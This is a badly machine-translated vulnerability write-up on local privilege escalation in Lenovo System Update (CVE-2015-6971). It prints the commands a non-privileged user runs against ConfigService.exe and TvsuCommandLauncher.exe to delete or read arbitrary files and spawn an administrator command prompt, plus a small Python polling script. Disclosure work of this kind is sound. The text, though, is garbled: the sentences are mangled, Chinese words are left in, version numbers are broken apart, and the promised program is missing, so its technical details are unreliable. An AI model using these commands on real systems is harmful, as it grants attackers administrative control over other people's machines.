In the last 7 months, Lenovo a large number of system updates, software vulnerabilities let a person Shine at the moment. Lenovo this spring to fix the first vulnerability, I decided to learn more about these patches to verify the presence of these vulnerabilities. The results I found a related Vulnerability(CVE-2 0 1 5-6 9 7 1), Next I will in detail be described. Background Lenovo brand most of the computer contains a is used to update the system software, which is responsible for detecting the computer hardware configuration of the driver and other software to the latest version(including Windows System patch), the user can through the Lenovo System Update to download and install the update. Vulnerability discovery The vulnerability was originally developed by Security vendor IOActive found that, due to software design flaws local user permissions can be elevated to SYSTEM. In the detection of the patch version 5. 0 6. 0 0 3 4 When I find it and is not completely repaired. Lenovo System Update 5.06.0034 comprising a plurality of components. One is running the Local System account of the Windows service through a named channel, the service may receive a user command. Another is to have the signature of the client application, the service will refuse to perform in addition to the signature outside of any application command. The problem for the code injected into the running of the original process resulting in the service end of the bypasssecurity testingto say that some tasteless. Lenovo in 9 month released another patch for the Fix. Look at the new version 5. 0 7. 0 0 0 8, I discovered a series of new questions: thanks to which there is a legitimate console, no privilege user can also from system to delete arbitrary files. Working principle The following code is in Windows 1 0 3 2-bit under test: 6 4-bit machine needs to be%ProgramFiles%replace%ProgramFiles(x86)%, and the detection of 3 2-bit registry location(Wow6432Node). "%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start "%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute UACSdk.exe /the arguments "A1 A2 C:\Users\Administrator\Documents\TopSecret.txt A3" /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND 注意 观察 TopSecret.txt the. If this file is for system components function is very important, that we can use this issue to cause denial of service. Next we will look for a low-rights user is how to through this vulnerability to read arbitrary files. As the internal processing part of Lenovo System Update service to copy any file to the user can read the position, we now specify the above examples(C:\Users\Administrator\Documents\TopSecret.txt)as a demo. Monitoring of this location and read the content very tedious, so I wrote a simple Python script to verify: import sys while True: try:
f = open("C:\\Program Files\the\Lenovo\\System Update\\temp. reg", "r") print(f. read()) f. close() break except IOError as err: sys. stdout. write(".") Detect registry as well as the emergence of new value, this also means that an attacker can change the existing state of loading malicious code. For example, by replacing the InProcServer32 the system components location, a long time ago(Windows 3.1-style)on the existence of such a method, however, the Lenovo software and not to its import restrictions. Finally, since the command processing vulnerabilities, we can through the administrator permission to execute the command. Welcome to the hands-on go to see, Using a non-privileged user, run the following command: "%ProgramFiles%\Lenovo\System Update\ConfigService.exe" start echo test > C:\Users\Public\S.log "%ProgramFiles%\Lenovo\System Update\TvsuCommandLauncher.exe" /execute uacsdk.exe /the arguments "A1 A2 C:\Users\Public\S.log "" """ /directory "%ProgramFiles%\Lenovo\System Update" /type COMMAND At this point you should see the Lenovo System Update GUI, then compile the following small program(from%ProgramFiles%\Lenovo\System Update\ 复制 UNCObject.dll)and use a non-privileged user to run ! This will open a Command Prompt window, the user can perform admin-level access(as the BUILTIN\Administrators group is a member of). Next low privilege user can replace the privileges the user of the work! Summary Lenovo software multiple vulnerabilities that allow unauthorized users to get administrator privileges for the enterprise environment, the issue is human life. Lenovo recently released a new version(5.07.0013)to solve this problem.